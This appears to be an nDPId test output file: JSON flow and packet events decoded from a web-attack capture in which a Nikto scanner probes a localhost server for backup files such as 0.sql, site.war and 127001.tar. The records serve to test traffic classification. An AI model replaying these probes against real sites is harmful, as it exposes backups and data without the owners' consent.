-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277347,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ZRVAAEAG1yF\/AAABfwAAAcTgH5Bb9F2rFITQsoAYAED+swAAAQEICp1m\/YudZv2LR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277349,"pkt":"AAAAAAAAAAAAAAAACABFAADCefJAAEAGwkF\/AAABfwAAAcTiH5DNN0FKl3iI04AYAED+tgAAAQEICp1m\/Y2dZv2MR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277349,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}} 
